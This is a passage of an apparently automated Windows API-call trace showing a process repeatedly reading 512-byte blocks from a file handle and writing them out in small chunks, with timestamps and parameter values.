out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.294] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.294] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.295] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.295] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.297] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.297] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.298] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.299] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.300] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.300] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.302] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.302] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.303] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.303] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] GetFileType (hFile=0x50) returned 0x1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.303] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.303] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] GetFileType (hFile=0x50) returned 0x1 [0151.304] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.304] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.305] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.305] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] GetFileType (hFile=0x50) returned 0x1 [0151.305] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.305] WriteFile (in: 